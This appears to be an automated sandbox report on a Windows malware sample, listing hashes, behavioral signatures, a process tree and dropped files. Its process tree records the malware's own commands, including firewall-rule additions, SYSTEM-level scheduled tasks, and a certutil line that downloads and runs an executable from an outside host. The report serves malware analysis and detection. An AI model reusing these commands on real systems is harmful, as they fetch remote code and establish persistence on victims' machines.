Analysis
- max time kernel: 41s
- max time network: 165s
- platform: windows10-2004_x64
- resource: win10v2004-20220414-en
- submitted: 24-05-2022 02:43
Static task: static1
Behavioral task: behavioral1
  Sample: 40485d4893e7a60b7d0898657abf820d9b67418aecd4279128699549c79817c2.exe
  Resource: win7-20220414-en
Behavioral task: behavioral2
  Sample: 40485d4893e7a60b7d0898657abf820d9b67418aecd4279128699549c79817c2.exe
  Resource: win10v2004-20220414-en
General
- Target: 40485d4893e7a60b7d0898657abf820d9b67418aecd4279128699549c79817c2.exe
- Size: 3.8MB
- MD5: 900302a2aa483020ee88f0bc7547baf1
- SHA1: 413d13f3ed8f330384b9354291cec2efa335342f
- SHA256: 40485d4893e7a60b7d0898657abf820d9b67418aecd4279128699549c79817c2
- SHA512: 556e6c523ba9be1ce39147f34d4859b45cacc9cb2e2ffce5ca90a7eafd821d7ec0d06be7529e6853f445b1acc80d842b987f896f748830ebf8a4d58fb0ec73d4
Malware Config
Signatures
- Suspicious use of NtCreateUserProcessOtherParentProcess (1 IoCs)
  Processes:
  description | pid | process | target process
  PID 2988 created 3104 | 2988 | svchost.exe | 40485d4893e7a60b7d0898657abf820d9b67418aecd4279128699549c79817c2.exe
- Modifies Windows Firewall (1 TTPs)
- Modifies boot configuration data using bcdedit (1 IoCs)
  Processes:
  pid | process
  3544 | bcdedit.exe
- Program crash (2 IoCs)
  Processes:
  pid | pid_target | process | target process
  3464 | 3104 | WerFault.exe | 40485d4893e7a60b7d0898657abf820d9b67418aecd4279128699549c79817c2.exe
  864 | 4364 | WerFault.exe | 40485d4893e7a60b7d0898657abf820d9b67418aecd4279128699549c79817c2.exe
- Creates scheduled task(s) (1 TTPs, 2 IoCs)
  Schtasks is often used by malware for persistence or to perform post-infection execution.
  Processes:
  pid | process
  1596 | schtasks.exe
  4544 | schtasks.exe
- Suspicious behavior: EnumeratesProcesses (4 IoCs)
  Processes:
  pid | process
  3104 | 40485d4893e7a60b7d0898657abf820d9b67418aecd4279128699549c79817c2.exe
  3104 | 40485d4893e7a60b7d0898657abf820d9b67418aecd4279128699549c79817c2.exe
  4364 | 40485d4893e7a60b7d0898657abf820d9b67418aecd4279128699549c79817c2.exe
  4364 | 40485d4893e7a60b7d0898657abf820d9b67418aecd4279128699549c79817c2.exe
- Suspicious use of AdjustPrivilegeToken (4 IoCs)
  Processes:
  description | pid | process
  Token: SeDebugPrivilege | 3104 | 40485d4893e7a60b7d0898657abf820d9b67418aecd4279128699549c79817c2.exe
  Token: SeImpersonatePrivilege | 3104 | 40485d4893e7a60b7d0898657abf820d9b67418aecd4279128699549c79817c2.exe
  Token: SeTcbPrivilege | 2988 | svchost.exe
  Token: SeTcbPrivilege | 2988 | svchost.exe
- Suspicious use of WriteProcessMemory (3 IoCs)
  Processes:
  description | pid | process | target process
  PID 2988 wrote to memory of 4364 | 2988 | svchost.exe | 40485d4893e7a60b7d0898657abf820d9b67418aecd4279128699549c79817c2.exe
  PID 2988 wrote to memory of 4364 | 2988 | svchost.exe | 40485d4893e7a60b7d0898657abf820d9b67418aecd4279128699549c79817c2.exe
  PID 2988 wrote to memory of 4364 | 2988 | svchost.exe | 40485d4893e7a60b7d0898657abf820d9b67418aecd4279128699549c79817c2.exe
Processes
- C:\Users\Admin\AppData\Local\Temp\40485d4893e7a60b7d0898657abf820d9b67418aecd4279128699549c79817c2.exe
  Command line: "C:\Users\Admin\AppData\Local\Temp\40485d4893e7a60b7d0898657abf820d9b67418aecd4279128699549c79817c2.exe"
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  - C:\Users\Admin\AppData\Local\Temp\40485d4893e7a60b7d0898657abf820d9b67418aecd4279128699549c79817c2.exe
    Command line: "C:\Users\Admin\AppData\Local\Temp\40485d4893e7a60b7d0898657abf820d9b67418aecd4279128699549c79817c2.exe"
    - Suspicious behavior: EnumeratesProcesses
    - C:\Windows\system32\cmd.exe
      Command line: C:\Windows\Sysnative\cmd.exe /C "netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes"
      - C:\Windows\system32\netsh.exe
        Command line: netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes
    - C:\Windows\system32\cmd.exe
      Command line: C:\Windows\Sysnative\cmd.exe /C "netsh advfirewall firewall add rule name="CloudNet" dir=in action=allow program="C:\Users\Admin\AppData\Roaming\83876a664c4b\83876a664c4b\83876a664c4b.exe" enable=yes"
    - C:\Windows\SysWOW64\WerFault.exe
      Command line: C:\Windows\SysWOW64\WerFault.exe -u -p 4364 -s 676
      - Program crash
    - C:\Windows\rss\csrss.exe
      Command line: C:\Windows\rss\csrss.exe ""
      - C:\Windows\SYSTEM32\schtasks.exe
        Command line: schtasks /CREATE /SC ONLOGON /RL HIGHEST /RU SYSTEM /TR "cmd.exe /C certutil.exe -urlcache -split -f https://gfixprice.space/app/app.exe C:\Users\Admin\AppData\Local\Temp\csrss\scheduled.exe && C:\Users\Admin\AppData\Local\Temp\csrss\scheduled.exe /31340" /TN ScheduledUpdate /F
        - Creates scheduled task(s)
      - C:\Windows\SYSTEM32\schtasks.exe
        Command line: schtasks /CREATE /SC ONLOGON /RL HIGHEST /TR "C:\Windows\rss\csrss.exe" /TN csrss /F
        - Creates scheduled task(s)
      - C:\Users\Admin\AppData\Local\Temp\csrss\patch.exe
        Command line: "C:\Users\Admin\AppData\Local\Temp\csrss\patch.exe"
      - C:\Windows\system32\bcdedit.exe
        Command line: C:\Windows\Sysnative\bcdedit.exe /v
        - Modifies boot configuration data using bcdedit
  - C:\Windows\SysWOW64\WerFault.exe
    Command line: C:\Windows\SysWOW64\WerFault.exe -u -p 3104 -s 880
    - Program crash
- C:\Windows\system32\svchost.exe
  Command line: C:\Windows\system32\svchost.exe -k netsvcs -p -s seclogon
  - Suspicious use of NtCreateUserProcessOtherParentProcess
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of WriteProcessMemory
- C:\Windows\SysWOW64\WerFault.exe
  Command line: C:\Windows\SysWOW64\WerFault.exe -pss -s 444 -p 3104 -ip 3104
- C:\Windows\system32\netsh.exe
  Command line: netsh advfirewall firewall add rule name="CloudNet" dir=in action=allow program="C:\Users\Admin\AppData\Roaming\83876a664c4b\83876a664c4b\83876a664c4b.exe" enable=yes
- C:\Windows\SysWOW64\WerFault.exe
  Command line: C:\Windows\SysWOW64\WerFault.exe -pss -s 416 -p 4364 -ip 4364
Network
MITRE ATT&CK Matrix (ATT&CK v6)
Downloads
- C:\Users\Admin\AppData\Local\Temp\csrss\patch.exe
  Filesize: 1.6MB
  MD5: 3ec1b10862b9d136145adfada8b8e209
  SHA1: 38ccaeb776d11692a52906469b22d287a3ca55a2
  SHA256: edfbf81cfb2525e5d47ea72b17640e4d80a55ee604394f3442c87241d417c4c4
  SHA512: f454100d2564ca43be78f37ee36ad830dbeb7215770c865785a64053bcfb5634b112782eecfb70c21cec3ce82b5100f477929bbeac7578e3d31bcbbe530bf46b
- C:\Windows\rss\csrss.exe
  Filesize: 1.6MB
  MD5: ed616af4c080b62fb6a36b40b5606c7d
  SHA1: 9df7fee4983396769d23ce468bb63c9e691806a8
  SHA256: 9edf27690b361e6470a65717e88f8665e561bc1345f89dc5d7d1b7d8bb543d8d
  SHA512: ecc9f144eadb8abd917c3f75abc7065495270a32010e389b675c3313b94185196d1daca81f1473b48f27f546bee9cd1ff5de5d6bd6da88c839a75870ff4f8bcb
- C:\Windows\rss\csrss.exe
  Filesize: 1.5MB
  MD5: 61ecf4f4abeacd59e6888688559218de
  SHA1: 6ee1ea6e53e2e06747444cea94e33a72f2c6b80c
  SHA256: 641a41b15724aeff9e7c341c9bdf4d167337c9b8936c186ba7bd6c428be7d7ae
  SHA512: 0a5d68ada05ece2155e40e194e8c8995058f0291efb5ac1ec18091063ec29cbf436e4550b00bc5c36183c4a0a8bc09a750eed545ef8500b559f87a76da39f909
- memory/1596-144-0x0000000000000000-mapping.dmp
- memory/2592-145-0x0000000001400000-0x00000000017A6000-memory.dmp
  Filesize: 3.6MB
- memory/2592-146-0x0000000000400000-0x0000000000BFD000-memory.dmp
  Filesize: 8.0MB
- memory/2592-140-0x0000000000000000-mapping.dmp
- memory/3104-132-0x0000000000400000-0x0000000000BFD000-memory.dmp
  Filesize: 8.0MB
- memory/3104-131-0x00000000012D0000-0x00000000019C5000-memory.dmp
  Filesize: 7.0MB
- memory/3104-130-0x0000000000F1E000-0x00000000012C4000-memory.dmp
  Filesize: 3.6MB
- memory/3544-149-0x0000000000000000-mapping.dmp
- memory/3620-134-0x0000000000000000-mapping.dmp
- memory/3788-147-0x0000000000000000-mapping.dmp
- memory/4364-136-0x000000000104D000-0x00000000013F3000-memory.dmp
  Filesize: 3.6MB
- memory/4364-137-0x0000000000400000-0x0000000000BFD000-memory.dmp
  Filesize: 8.0MB
- memory/4364-133-0x0000000000000000-mapping.dmp
- memory/4508-138-0x0000000000000000-mapping.dmp
- memory/4544-143-0x0000000000000000-mapping.dmp
- memory/4844-135-0x0000000000000000-mapping.dmp
- memory/4888-139-0x0000000000000000-mapping.dmp